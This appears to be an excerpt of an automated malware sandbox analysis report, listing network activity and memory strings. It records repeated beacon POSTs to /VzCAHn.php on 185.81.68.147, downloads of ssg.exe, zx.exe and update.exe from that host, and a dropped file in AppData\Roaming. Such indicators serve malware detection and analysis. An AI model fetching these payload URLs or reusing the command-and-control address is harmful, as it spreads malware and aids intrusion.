                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF794831CDC InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,RtlAllocateHeap,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,1_2_00007FF794831CDC
                  Source: global trafficHTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: global trafficHTTP traffic detected: GET /zx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: unknownHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: explorer.exe, 00000007.00000003.3101632839.000000000AA14000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/ssg.exe
                  Source: explorer.exe, 00000007.00000003.3101632839.000000000AA14000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/update.exe
                  Source: explorer.exe, 00000007.00000003.3101632839.000000000AA14000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/zx.exe
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE6F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE6C000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: explorer.exe, 00000007.00000000.2061516657.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2061516657.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE6F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE6F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE6C000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2262199311.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2262199311.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic3
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: explorer.exe, 00000007.00000002.3291497837.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2049075653.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE6F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE6C000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: explorer.exe, 00000007.00000000.2061516657.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2061516657.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE6F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE6F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE6C000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE6F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE6C000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: explorer.exe, 00000007.00000000.2061516657.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2061516657.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE6F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE6F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE6C000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
